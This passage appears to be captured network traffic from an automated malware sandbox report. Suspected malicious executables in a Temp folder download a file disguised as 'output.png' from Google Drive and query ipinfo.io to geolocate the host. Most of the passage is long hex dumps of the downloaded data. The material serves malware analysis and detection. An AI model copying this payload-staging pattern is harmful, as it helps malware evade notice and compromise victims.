                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1
                                                                                                                                                                                                                                                                                        Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b
                                                                                                                                                                                                                                                                                        Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58
                                                                                                                                                                                                                                                                                        Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        4192.168.2.1049889216.58.208.2384431528C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:24 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:24 GMT
                                                                                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nweYaxKkoqcO7gEBEqEvvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        5192.168.2.104989534.117.59.814438092C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:26 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                        date: Thu, 12 Dec 2024 15:48:26 GMT
                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:26 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        6192.168.2.1049896172.217.17.654431528C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:26 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 156917
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC6muWdqR7Ip6NGTdYp9M-ofi5iiuO3EE0abqpDK7cxNJg9Kek79aWKJXz6-7jUQ2B_ZiGc
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:29 GMT
                                                                                                                                                                                                                                                                                        Expires: Thu, 12 Dec 2024 15:48:29 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC4870INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                                                                                                                                        Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1321INData Raw: 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 f7 8e
                                                                                                                                                                                                                                                                                        Data Ascii: Q q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 c4
                                                                                                                                                                                                                                                                                        Data Ascii: 1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d 4a
                                                                                                                                                                                                                                                                                        Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-J
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 a8
                                                                                                                                                                                                                                                                                        Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 ac
                                                                                                                                                                                                                                                                                        Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 13
                                                                                                                                                                                                                                                                                        Data Ascii: >Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b 0f
                                                                                                                                                                                                                                                                                        Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC1390INData Raw: 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 31
